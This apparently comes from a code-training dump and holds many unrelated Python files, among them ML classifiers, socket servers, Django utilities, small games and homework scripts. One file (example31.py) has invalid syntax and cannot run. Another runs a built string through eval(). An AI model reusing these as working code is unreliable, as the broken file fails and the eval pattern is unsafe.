DictVectorizer\n\nfrom matplotlib import pyplot\n\n\nfrom sklearn.linear_model import SGDClassifier\nfrom lightgbm import LGBMClassifier\n\nimport io\nimport json\n\nimport jieba\nimport jieba.posseg as pseg\nimport gensim\n\nfrom constant import id2category\n\n\nclass ClassifierWrapper(BaseEstimator, TransformerMixin):\n\n def __init__(self, estimator, verbose=None, fit_params=None, use_proba=True, scoring=None):\n self.estimator = estimator\n self.verbose = verbose # True = 1, False = 0, 1 - moderately verbose, 2- extra verbose\n if verbose is None:\n self.verbose = 0\n else:\n self.verbose = verbose\n self.fit_params = fit_params\n self.use_proba = use_proba # whether to use predict_proba in transform\n self.scoring = scoring # calculate validation score, takes score function name\n # TODO check if scorer imported?\n self.score = None # variable to keep the score if scoring is set.\n\n def fit(self, X, y):\n fp = self.fit_params\n if self.verbose == 2:\n print(\"X: \", X.shape, \"\\nFit params:\", self.fit_params)\n\n if fp is not None:\n self.estimator.fit(X, y, **fp)\n else:\n self.estimator.fit(X, y)\n\n return self\n\n def transform(self, X):\n if self.use_proba:\n return self.estimator.predict_proba(X) # [:, 1].reshape(-1,1)\n else:\n return self.estimator.predict(X)\n\n def fit_transform(self, X, y, **kwargs):\n self.fit(X, y)\n p = self.transform(X)\n if self.scoring is not None:\n self.score = eval(self.scoring+\"(y,p)\")\n # TODO print own instance name?\n if self.verbose > 0:\n print(\"score: \", self.score)\n return p\n\n def predict(self, X):\n return self.estimator.predict(X)\n\n def predict_proba(self, X):\n return self.estimator.predict_proba(X)\n\n\ndef tokenize(text):\n # return jieba.lcut(text)\n return list(text)\n\n\ndef save_model(grid, filename='../model/xgb.pkl'):\n joblib.dump(grid, filename, compress=1)\n\n\ndef load_model(filename='../model/xgb.pkl'):\n grid = joblib.load(filename)\n return grid\n\n\nclass TextStats(BaseEstimator, TransformerMixin):\n \"\"\"Extract features from each document for DictVectorizer\"\"\"\n\n def fit(self, x, y=None):\n return self\n\n def transform(self, x):\n with io.open('../data/kp.bson', encoding='utf8') as f:\n concepts = set()\n for line in f.readlines():\n concepts.add(json.loads(line.strip())['concept'])\n\n return [{\n 'length': len(text),\n # 'concept_cnt': sum([1 for t in concepts if t in text]),\n # 'ratio_word': len(jieba.lcut(text)) * 1. / len(text) if len(text) else 0,\n # 'ratio_repeat': len(set(text)) * 1. / len(text) if len(text) else 0,\n # 'ratio_alpha': sum([1 for t in text if t.isalpha()]) / len(text) if len(text) else 0\n } for text in x]\n\n\ndef train():\n # the training data folder must be passed as first argument\n dataset_train = load_files(\n '../data/svm/train', shuffle=False, encoding='utf8')\n dataset_test = load_files(\n '../data/svm/test', shuffle=False, encoding='utf8')\n print(\"n_samples: %d\" % len(dataset_train.data))\n\n docs_train, docs_test = dataset_train.data, dataset_test.data\n y_train, y_test = dataset_train.target, dataset_test.target\n\n # split the dataset in training and test set:\n\n model = LGBMClassifier()\n\n print(model)\n text_clf = Pipeline([(\n 'features', FeatureUnion([\n ('tfidf', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize, ngram_range=(1, 3))),\n ('tfidf', TfidfTransformer())\n ])),\n ('stats', Pipeline([\n ('stats', TextStats()),\n ('vect', DictVectorizer())\n ])),\n # ('sgd', Pipeline([\n # ('vect', CountVectorizer(tokenizer=tokenize, ngram_range=(1, 3))),\n # ('tfidf', TfidfTransformer()),\n # ('sgd', ClassifierWrapper(SGDClassifier(loss='log')))\n # ])),\n ])),\n ('clf', model)\n ])\n\n text_clf.fit(docs_train, y_train)\n\n y_predicted = text_clf.predict(docs_test)\n\n # Print the classification report\n print(metrics.classification_report(y_test, y_predicted,\n target_names=dataset_test.target_names))\n\n # Print and plot the confusion matrix\n cm = metrics.confusion_matrix(y_test, y_predicted)\n print(cm)\n\n save_model(text_clf)\n\n print(model.feature_importances_)\n\n # plot_importance(model)\n # pyplot.show()\n\n\ndef predict(clf, question):\n return clf.predict([question])[0]\n\n\ndef predict_proba(clf, question):\n return clf.predict_proba([question])\n\n\nif __name__ == \"__main__\":\n train()\n grid = load_model()\n question = u'数据结构当中的图怎么都弄不懂怎么办?'\n print(predict(grid, question))\n print(predict_proba(grid, question))\n","sub_path":"sklearn_baseline/ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"444520742","text":"import numpy as np\nfrom aocd import data\n\n\ndef part_a(data, roll=1):\n a = np.fromiter(data, dtype=int)\n b = np.roll(a, roll)\n return a[a == b].sum()\n\n\ndef part_b(data):\n return part_a(data, roll=len(data) // 2)\n\n\ntests_a = {\n \"1122\": 3,\n \"1111\": 4,\n \"1234\": 0,\n \"91212129\": 9,\n}\nfor test_data, expected in tests_a.items():\n assert part_a(test_data) == expected\n\ntests_b = {\n \"1212\": 6,\n \"1221\": 0,\n \"123425\": 4,\n \"123123\": 12,\n \"12131415\": 4,\n}\nfor test_data, expected in tests_b.items():\n assert part_b(test_data) == expected\n\nprint(\"part a:\", part_a(data))\nprint(\"part b:\", part_b(data))\n","sub_path":"aoc_wim/aoc2017/q01.py","file_name":"q01.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"593062494","text":"import matplotlib.pyplot as plt\r\nimport h5py\r\n\r\nfor i in range(1,6):\r\n filename=\"data_\"+str(i)+\".h5\"\r\n f=h5py.File(filename,'r')\r\n l=list(f.keys())\r\n attri=f[l[0]]\r\n label=f[l[1]]\r\n\r\n for j in range(label.shape[0]):\r\n if(label[j]==0):\r\n c1=plt.scatter(attri[j,0],attri[j,1],c='m')\r\n elif(label[j]==1):\r\n c2=plt.scatter(attri[j,0],attri[j,1],c='r')\r\n elif(label[j]==2):\r\n c3=plt.scatter(attri[j,0],attri[j,1],c='b')\r\n\r\n plt.title(\"Scatter Plot for Dataset \"+str(i))\r\n if(i==3):\r\n plt.legend((c1,c2,c3),(\"Class 0\",\"Class 1\",\"Class 2\"))\r\n else:\r\n plt.legend((c1,c2),(\"Class 0\",\"Class 1\")) \r\n plt.show()\r\n\r\n \r\n \r\n \r\n\r\n","sub_path":"Assignment 2/1A.py","file_name":"1A.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"252186801","text":"'''\n 阻塞IO服务端\n'''\n\nimport socket\nimport time\n\nserver = socket.socket()\nserver.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n\nserver.bind(('127.0.0.1',8083))\nserver.listen(5)\nprint('卡哪儿了')\nserver.setblocking(False)\n\nrlist = []\nrl = []\n\nwhile 1:\n try:\n conn,addr = server.accept()\n print(addr)\n rlist.append(conn)\n print('来自%s:%s的链接请求' % (addr[0],addr[1]))\n except BlockingIOError:\n print('去买点药')\n\n time.sleep(0.1)\n print('rlist',rlist,len(rlist))\n\n for con in rlist:\n try:\n from_client_msg = con.recv(1024)\n except BlockingIOError:\n continue\n except ConnectionResetError:\n con.close()\n rl.append(con)\n print('>>>>',rl)\n for remove_con in rl:\n rlist.remove(remove_con)\n rl.clear()\n\n\n","sub_path":"day29/05-阻塞IO的socket服务端.py","file_name":"05-阻塞IO的socket服务端.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"421923852","text":"#compare two list, two dicts\nfirstlist = ['cats','dogs',55]\nsecondlist = ['dogs',55,'cats']\nprint(firstlist == secondlist)\n\nfirstDict= {'name':'Apiwat', 'species':'inhuman', 'age':'999'}\nsecondDict={'species':'inhuman', 'age':'999','name':'Apiwat'}\nprint(firstDict==secondDict)\n\nmyCat = {'size':'small', 'color':'white','disposition':'loud'}\nprint('My cat has ' + myCat['color']+ 'fur.')","sub_path":"ON/ZhihanShi/Module3/dictionary_data_type.py","file_name":"dictionary_data_type.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"372406106","text":"from django.http import JsonResponse\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom django.core.validators import validate_email\n\nfrom django.http import HttpResponse\nimport csv\nimport io\n\nimport logging\nfrom django.conf import settings\n\nlogger = logging.getLogger('django')\n\n# @app.task(bind=True)\ndef send_email(subject, body, to):\n if not isinstance(to, list):\n to = [to]\n\n try:\n to = list(map(str, to))\n for email in to:\n validate_email(email)\n except Exception as e:\n return False, 'Invalid emails'\n\n msg = MIMEMultipart()\n msg['From'] = settings.EMAIL_HOST_USER\n msg['To'] = ','.join(to)\n msg['Subject'] = str(subject)\n msg.attach(MIMEText(str(body), 'html'))\n text = msg.as_string()\n try:\n server = smtplib.SMTP_SSL(':'.join([settings.EMAIL_HOST, str(settings.EMAIL_PORT)]))\n server.login(settings.EMAIL_HOST_USER, settings.EMAIL_HOST_PASSWORD)\n server.sendmail(settings.DEFAULT_FROM_EMAIL, to, text)\n server.close()\n return True, True\n except Exception as e:\n logger.error(str(e))\n return False, str(e)\n\n\ndef generate_csv_response(ser, queryset, is_dict=False, append_csv_field=False):\n out = io.StringIO()\n csv_writer = csv.writer(out)\n\n if not is_dict and append_csv_field:\n for q in list(queryset):\n q.csv = True\n\n objects = []\n if is_dict:\n serialized = ser(data=queryset, many=True)\n serialized.is_valid(raise_exception=True)\n objects = serialized.data\n else:\n objects = ser(queryset, many=True).data\n\n if objects:\n csv_writer.writerow(objects[0].keys())\n\n for obj in objects:\n csv_writer.writerow(obj.values())\n\n response = HttpResponse(out.getvalue(), content_type=\"application/csv\")\n response['Content-Disposition'] = 'attachment;filename=data.csv'\n return response\n\n\ndef _get_queryset(cls, key):\n if hasattr(cls, '_default_manager'):\n return cls._default_manager.get(pk=key)\n return cls\n\n\ndef get_object_or_404(cls, key):\n try:\n _object = _get_queryset(cls, key)\n return _object, True\n except Exception as e:\n logger.error(e)\n return JsonResponse({\"status\": \"error\", \"desc\": \"Not found\", \"detail\": str(e)}, status=404), False\n","sub_path":"back_api/back_api/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"461657848","text":"\"\"\"\nScrape the schedule for accepted talks.\n\nProduces a JSON file suitable for passing as a --data argument to email-authors.\nI use this to to send a preview of when their talks are scheduled (see\nemail-templates/check-schedule-template.txt).\n\"\"\"\n\nimport argparse\nimport dateutil.parser\nimport json\nimport lxml.html\nimport sys\nimport urllib\nimport pycon_bot.mongo\nfrom pycon_bot.models import TalkProposal\n\n# Where's the schedue list?\nURL = 'https://us.pycon.org/2013/schedule/talks/list/'\n\n# Map and normalize days to datetimes\nDAY_MAP = {\n 'Friday': 'Friday, March 15th',\n 'Saturday': 'Saturday, March 16th',\n 'Sunday': 'Sunday, March 17th',\n}\n\np = argparse.ArgumentParser()\np.add_argument('--dsn', help=\"Mongo DSN\")\nargs = p.parse_args()\nif not pycon_bot.mongo.connect(args.dsn):\n p.error(\"Need to pass --dsn or set env[MONGO_DSN].\")\n\ndoc = lxml.html.parse(urllib.urlopen('https://us.pycon.org/2013/schedule/talks/list/')).getroot()\ndata = {}\n\nfor div in doc.cssselect('div.presentation'):\n # Find the link so we can look up which talk_id this refers to\n link = 'https://us.pycon.org' + div.find('h3/a').attrib['href']\n talk = TalkProposal.objects.get(public_url=link)\n\n # Parse out the scheduled timeslot\n schedule_text = div.findall('h4')[-1].text.strip()\n day, startstop, _, _ = [t.strip() for t in schedule_text.split('\\n')]\n start, stop = startstop.replace('noon', '12:00 pm').split(u'\\u2013')\n slot_length = dateutil.parser.parse(stop) - dateutil.parser.parse(start)\n\n data[talk.talk_id] = {\n 'day': DAY_MAP[day],\n 'start': start,\n 'stop': stop,\n 'length': '%i minutes' % (slot_length.total_seconds() / 60),\n }\n\njson.dump(data, sys.stdout, indent=2)\n","sub_path":"scripts/scrape-schedule.py","file_name":"scrape-schedule.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"405014194","text":"import os, re\n\nclass AclConfig:\n def __init__(self):\n self.bfname = ''\n self.logname = ''\n self.bfdate = ''\n self.remark = ''\n self.permit = ''\n self.permittype = ''\n\ndef getaclconfig(fileinsertlist, source_path, acllist):\n source_path = os.chdir(source_path)\n for filename in fileinsertlist:\n filename = filename.rstrip()\n data = None\n with open(filename, 'r') as text:\n data = text.read().rstrip()\n bfname = filename\n logname = filename[:12]\n bfdate = filename[13:28]\n accesslist = re.compile('configure ipv6 access\\-list (.*) permit *ip *(.*) |configure access\\-list (.*) '\n 'permit *(.*)|configure access\\-list (.*) remark *\\\"(.*)\\\"|configure ipv6 access\\-list '\n '(.*) * remark *\\\"(.*)\\\"')\n for v6type,v6permit,v4type,v4permit,v4remarktype,v4remark,v6remarktype,v6remark in re.findall(accesslist, data):\n aclobject = AclConfig()\n if v4remark != '':\n group = 'v4'\n remark = v4remark\n remarktype = v4remarktype\n elif v6remark != '':\n group = 'v6'\n remark = v6remark\n remarktype = v6remarktype\n elif group == 'v4' and v4type != '' and v4permit != '':\n aclobject.logname = logname\n aclobject.bfname = bfname\n aclobject.bfdate = bfdate\n aclobject.remark = remark\n aclobject.permittype = remarktype\n aclobject.permit = v4permit\n acllist.append(aclobject)\n elif group == 'v6' and v6type != '' and v6permit != '':\n aclobject.logname = logname\n aclobject.bfname = bfname\n aclobject.bfdate = bfdate\n aclobject.remark = remark\n aclobject.permittype = remarktype\n aclobject.permit = v6permit\n acllist.append(aclobject)","sub_path":"pyrob/loads/hfc/cfg/cmts_dm_cfg_bu_acl.py","file_name":"cmts_dm_cfg_bu_acl.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"209672946","text":"import random\n\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\nimage = [rock, paper, scissors]\nchoice = int(input(\"What do you choose? 0 for rock, 1 for paper, 2 for scissors.\\n\"))\nif choice < 3:\n print(image[choice])\nelse:\n print(\"Invalid input, you lose!\")\n# if choice == 0:\n# print(rock)\n# elif choice == 1:\n# print(paper)\n# elif choice == 2:\n# print(scissors)\n# else:\n# print(\"Invalid number, you lose!\")\n\nchoice_computer = random.randint(0,2)\n# if choice < 3:\n# print(\"Computer chose: \")\n# if choice_computer == 0:\n# print(rock)\n# elif choice_computer == 1:\n# print(paper)\n# else:\n# print(scissors)\n\nif choice < 3:\n print(image[choice_computer])\n if choice == choice_computer:\n print(\"It's a tie.\")\n elif (choice == 0 and choice_computer == 1) or (choice == 1 and choice_computer == 2) or (choice == 2 and choice_computer == 0):\n print(\"You lose!\")\n else:\n print(\"You win!\")\n","sub_path":"Day4-list/rock-paper-scissors-start.py","file_name":"rock-paper-scissors-start.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"3612752","text":"#!/usr/bin/env python\n\"\"\"\ndicts.py\n\nDictionaries\n============================================================ \nIn this section, write some functions which build and \nmanipulate python dictionaries.\n\"\"\"\n\ndef freq(data):\n frequency = dict()\n for x in range(0,len(data)):\n if data[x] not in frequency:\n frequency[data[x]] = 1\n else:\n frequency[data[x]] += 1\n return frequency\n\n\n\n\nmovies = {}\n\ndef score(title, value):\n if title not in movies:\n movies[title] = [value]\n else:\n movies[title].append(value)\n \n \n\n\ndef avg_score(title):\n \"return the average score for a given movie\"\n if title in movies:\n to_sum = movies[title][:]\n score = 0\n score = float(score)\n for x in range (0,len(to_sum)):\n score += to_sum[x]\n score = score/len(to_sum)\n return score\n \n\n\n# 3. parse_csv (Advanced)\n# Takes an input string and spits back a list of comma\n# separated values (csv) entries. Hint, check the zip\n# and dict functions.\n#\n# The point of this is to create your own parser, not to\n# use pythons builtin 'csv' library.\n#\n# >>> csv = \"\"\"\n# name,age,email\n# Foo, 24, foo@example.com\n# Bar ,22 ,bar@example.com\n# Baz, 20 , baz@gmail.com\n# \"\"\"\n# >>> parse_csv(csv)\n# [ { \"name\": \"Foo\", \"age\": \"24\", \"email\": \"foo@example.com\" },\n# { \"name\": \"Bar\", \"age\": \"22\", \"email\": \"bar@example.com\" },\n# { \"name\": \"Baz\", \"age\": \"20\", \"email\": \"baz@example.com\" } ] \n\ndef parse_csv(data):\n \"parses a csv file into a list of dictionaries\"\n\n","sub_path":"hw10/dicts.py","file_name":"dicts.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"2865542","text":"from socket import *\nimport os\nimport signal\n\n\"\"\"\n### 基于fork的多进程网络并发模型\n\n#### 实现步骤\n\n1. 创建监听套接字\n2. 等待接收客户端请求\n3. 客户端连接创建新的进程处理客户端请求\n4. 原进程继续等待其他客户端连接\n5. 如果客户端退出,则销毁对应的进程\n\n\"\"\"\n\n# 全局变量\n\nHOST = \"0.0.0.0\"\nPORT = 11224\nADDR = (HOST, PORT)\n\n\n# 具体处理客户端请求\ndef handle(c):\n while True:\n data = c.recv(1024)\n if not data:\n break\n print(\"data recived:\", data.decode())\n c.send(b\"OK\")\n c.close()\n\n\n# 创建tcp 套接字\n\n\ns = socket()\ns.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\ns.bind(ADDR)\ns.listen(5)\n\n# 处理僵尸进程\nsignal.signal(signal.SIGCHLD, signal.SIG_IGN)\nprint(\"listen the port 8888...........\")\n\nwhile True:\n # 循环处理客户端连接\n c = None\n try:\n c, addr = s.accept()\n print(\"connect from\", addr)\n except KeyboardInterrupt:\n os._exit(0)\n except Exception as e:\n print(e)\n continue\n\n # 创建子进程处理客户端连接\n pid = os.fork()\n # 创建的套接字s 和 接受的套接字c 在子进程和父进程中都需要关闭\n # 子进程不需要自己创建的套接字s,提前关闭\n # 父进程不需要接受的套接字c,提前关闭\n\n if pid == 0:\n\n s.close()\n handle(c) # 处理具体事物\n os._exit(0) # 子进程销毁\n # 无论是pid < 0 还是 pid > 0 都要回去处理连接\n else:\n c.close() # 父进程不需要和客户端通信\n # 主线程只负责建立连接\n","sub_path":"part_02_system_programming/part_2_3_concur/day10/fork()_network_concurrency_model.py","file_name":"fork()_network_concurrency_model.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"46186938","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport pandas as pd\nimport numpy as np\n\ntrain_df = pd.read_csv(\"./data/train.csv\")\ncolors_list = train_df.color.unique()\ncolors_dict = {}\ncount = 0\nfor i in colors_list:\n colors_dict[i] = count\n count += 1\n\ntrain_df['color'] = train_df.color.apply(lambda x : colors_dict[x])\n\nnp.random.shuffle(train_df.values)\n\nmodel = keras.Sequential([\n keras.layers.Dense(32, input_shape = (2,), activation = 'relu'),\n keras.layers.Dense(32, activation = 'relu'),\n keras.layers.Dense(6, activation = 'sigmoid')])\n\nmodel.compile(optimizer = 'adam', loss = keras.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=['accuracy'])\n\nx = np.column_stack((train_df.x.values, train_df.y.values))\nmodel.fit(x, train_df.color.values, batch_size= 4, epochs = 10)\n\n\ntest_df = pd.read_csv(\"./data/test.csv\")\ntest_df['color'] = test_df.color.apply(lambda x : colors_dict[x])\nnp.random.shuffle(test_df.values)\ntest_x = np.column_stack((test_df.x.values, test_df.y.values))\n\nmodel.evaluate(test_x, test_df.color.values)\n\nprint(model.predict(np.array([[0.7, 3]])))\n","sub_path":"clusters.py","file_name":"clusters.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"348904784","text":"#classPart002.py\n#GStrader\n#Fall 16\n\nimport pygame, sys\nfrom pygame.locals import *\n\npygame.init()\n\nclass SQUARE (object):\n\n def __init__(self, size, surface, position):\n\n self.size = size\n self.surf = surface\n self.pos = position\n\n\n self.SQRSURF = pygame.Surface((self.size , self.size) , flags=SRCALPHA, depth=32)\n self.SQRSURF.fill((100 , 200 , 100 , 150))\n\n\n def changepos(self,position):\n\n self.pos = position\n\n \n def display(self):\n\n self.surf.blit(self.SQRSURF, self.pos)\ndef main():\n\n DISPLAYSURF = pygame.display.set_mode((1200 , 900))\n DISPLAYSURF.fill((255 , 255 , 255,100))\n \n SQ1 = SQUARE(200 , DISPLAYSURF , (500 , 300))\n SQ2 = SQUARE(200 , DISPLAYSURF , (200 , 300))\n SQ2.pos = (0,0)\n SQ1.changepos((300 , 500))\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n SQ1.display()\n SQ2.display()\n pygame.display.update()\n \nif __name__ == \"__main__\": main()\n","sub_path":"Nooblet/Introduction to OOP/classPart002.py","file_name":"classPart002.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"270607297","text":"# WAP find sum and avg of 10 , 3-digit random numbers\r\n\r\nimport random\r\n\r\ndef get_3digit_rand_nums(size):\r\n rand_nums = []\r\n #for i in range(size):\r\n i = 0\r\n while i++ --\r\n return rand_nums\r\n\r\ndef get_sum_avg(list_seq):\r\n s = 0\r\n for e in list_seq:\r\n s = s+e\r\n return s, s/len(list_seq)\r\n\r\nr_nums = get_3digit_rand_nums(10)\r\ntotal, avg = get_sum_avg(r_nums) \r\nprint(\"Total : {} and Avg: {}\".format(total, avg))\r\n\r\n\r\n\r\noutput = get_sum_avg(r_nums)\r\nprint(output, type(output))\r\nprint(\"Total : {} and Avg: {}\".format(output[0], output[1]))\r\n\r\n\r\n\r\n","sub_path":"example31.py","file_name":"example31.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"129171926","text":"from App import app\nfrom flask import request,url_for,send_from_directory\nimport config\n\n# 跨域设置\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n if request.method == 'OPTIONS':\n response.headers['Access-Control-Allow-Methods'] = 'DELETE, GET, POST, PUT'\n headers = request.headers.get('Access-Control-Request-Headers')\n if headers:\n response.headers['Access-Control-Allow-Headers'] = headers\n return response\n\n@app.route('/api/public/')\ndef getfile(filename):\n directory = config.PUBLIC_DIR # 假设在当前目录\n print(directory)\n return send_from_directory(directory, filename, as_attachment=True)\n\n\nfrom Controllers import AuthController,SpiderController","sub_path":"Controllers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"209034919","text":"class GameOfSegments:\n def winner(self, N):\n sg = [0] * 1001\n sg[2] = 1\n i = 3\n while i <= N:\n sg[i] = self.check(i, sg)\n i += 1\n\n if sg[N] == 0:\n return 2\n else:\n return 1\n\n def check(self, num, sg):\n sg_set = set()\n sg_set.add(sg[num-2])\n\n for i in xrange(1, num/2):\n tmp_sg = sg[i]^sg[num-2-i]\n sg_set.add(tmp_sg)\n\n i = 0\n while i in sg_set:\n i+=1\n return i\n","sub_path":"TopCoder/SRM624/SRM624_div2_3.py","file_name":"SRM624_div2_3.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"367229294","text":"from pico2d import *\n\n\nimport main_state\nimport game_framework\nfrom GameObject.Player import CPlayer\nimport CEffect\nname = 'Bullet'\n\n\nclass Bullet():\n image = [None,None,None,None]\n\n def __init__(self):\n pass\n def __init__(self, x, y,speed=720):\n self.x, self.y = x, y\n self.speed = speed\n self.isDead = False\n if Bullet.image[0] == None:\n Bullet.image[0] = load_image('../Resource/Bullet_Eg_a.png')\n if Bullet.image[1] == None:\n Bullet.image[1] = load_image('../Resource/Bullet_Eg_b.png')\n if Bullet.image[2] == None:\n Bullet.image[2] = load_image('../Resource/Bullet_Eg_c.png')\n if Bullet.image[3] == None:\n Bullet.image[3] = load_image('../Resource/Bullet_Eg_d.png')\n\n def update(self):\n self.y += self.speed * game_framework.frame_time\n if self.y > 960:\n return -1\n if self.isDead == True:\n return -1\n\n def draw(self):\n self.image[main_state.ListManager.Get_Player().Power].draw(self.x-5, self.y+10, 120, 120)\n\n\n\nclass Player_Lager():\n image = None\n\n def __init__(self):\n pass\n def __init__(self,x):\n self.DeltaX=x\n self.x, self.y=main_state.ListManager.Get_Player().x+self.DeltaX,main_state.ListManager.Get_Player().y\n self.isDead = False\n self.Frame=0\n self.LifeTime=0\n if Player_Lager.image== None:\n Player_Lager.image = load_image('../Resource/fire_lazer.png')\n\n def update(self):\n self.LifeTime+=1\n\n self.x =main_state.ListManager.Get_Player().x+self.DeltaX\n self.y =main_state.ListManager.Get_Player().y\n for n in main_state.ListManager.Monster_List:\n if n.x - n.RadianX < self.x < n.x+n.RadianX and self.y Set[str]:\n buffer = io.StringIO(self.blob.decode(\"utf-8\", errors=\"ignore\"))\n csv_reader = csv.reader(buffer)\n possible_urls = set()\n for row in csv_reader:\n for item in row:\n if \".\" in item and \"/\" in item:\n possible_urls.add(item)\n\n urls = URLList()\n for possible_url in possible_urls:\n urls += TextUrlFinder(possible_url).find_urls(strict=True)\n\n return set(urls)\n","sub_path":"urlfinderlib/finders/csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"131622606","text":"#build the dictionary\n_Q = (('`1234567890-=', '~!@#$%^&*()_+'),\n ('qwertyuiop[]\\\\','QWERTYUIOP{}|'),\n ('asdfghjkl;\\'','ASDFGHJKL:\"'),\n ('zxcvbnm,./','ZXCVBNM<>?'))\n_D = (('`1234567890[]','~!@#$%^&*(){}'),\n ('\\',.pyfgcrl/=\\\\','\"<>PYFGCRL?+|'),\n ('aoeuihdtns-','AOEUIDHTNS_'),\n (';qjkxbmwvz',':QJKXBMWVZ'))\n\n_QToD = {}\n_DToQ = {}\nfor i in xrange(0, len(_Q)):\n for j in xrange(0, len(_Q[i][0])):\n _QToD[_Q[i][0][j]] = _D[i][0][j]\n _QToD[_Q[i][1][j]] = _D[i][1][j]\n _DToQ[_D[i][0][j]] = _Q[i][0][j]\n _DToQ[_D[i][1][j]] = _Q[i][1][j]\n\ndef QwertyToDvorak(text):\n return ''.join(map(lambda s: _QToD[s], text))\n\ndef DvorakToQwerty(text):\n return ''.join(map(lambda s: _DToQ[s], text))\n","sub_path":"abandoned/pyfun/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"64795105","text":"import pickle\nimport sys\n\nglobal aut\n\ndef ReadFile(file_dir):\n try:\n curr_file = open(file_dir, \"r\", encoding=\"latin-1\")\n except:\n print(\"ERR: File not found!\")\n exit()\n lines = curr_file.read()\n chars = list()\n for line in lines:\n for char in line:\n chars.append(char)\n return chars\n\ndef EvalFile(chars):\n curr_state = \"A\"\n token_val = \"\"\n for i, symbol in enumerate(chars):\n\n\n if symbol in aut.ignore_set and i < len(chars)-1:\n continue\n\n if symbol in aut.trans_func[curr_state]:\n token_val += symbol\n curr_state = aut.trans_func[curr_state][symbol]\n continue\n\n\n if curr_state in aut.accepting_states:\n gen_state = aut.accepting_dict[curr_state]\n token = next(filter(lambda x: \"#-\" in x.value and x._id in gen_state, aut.nodes))\n token_type = token.value.split(\"#-\")[1]\n if token_type == \"ident\" and token_val in aut.keywords_value:\n keyword = next(filter(lambda x: x.value.value == token_val, aut.keywords))\n token_type = f\"KEYWORD: {keyword.value.value}\"\n if token_type == \"hexnumber\" and token_val in aut.keywords_value:\n keyword = next(filter(lambda x: x.value.value == token_val, aut.keywords))\n token_type = f\"KEYWORD: {keyword.value.value}\"\n else:\n token_type = \"None\"\n\n\n if token_val:\n print(f\"{repr(token_val)}\\t=>\\t{token_type}\")\n token_val = symbol\n\n if not symbol in aut.trans_func[\"A\"]:\n print(f\"{repr(token_val)}\\t=>\\tNone\")\n token_val = \"\"\n curr_state = \"A\"\n continue\n\n curr_state = aut.trans_func[\"A\"][symbol]\naut = pickle.load(open(\"./output/automata.p\", \"rb\"))\n\nfile_name = \"./input/test_input.txt\"\nif len(sys.argv) > 1: file_name = sys.argv[1]\nchars = ReadFile(file_name)\nEvalFile(chars)\n","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"645216213","text":"#!/usr/bin/python3\nimport rospy\nfrom std_msgs.msg import Int16, String, Bool\nfrom mcgreen_control.msg import Array\nfrom luma.core.interface.serial import i2c, spi\nfrom luma.core.render import canvas\nfrom luma.oled.device import ssd1327\nfrom PIL import ImageFont, ImageDraw\nfrom time import sleep\nimport textwrap\n\nserial = spi(device=0, port=0)\ndevice = ssd1327(serial)\nfont_size = 12\nfont_name = \"FreeMono.ttf\"\nfont = ImageFont.truetype(font_name, font_size)\n\nclass OLED:\n\tMODE_TOPIC = \"/mode_status\"\n\tUP_DOWN_TOPIC = 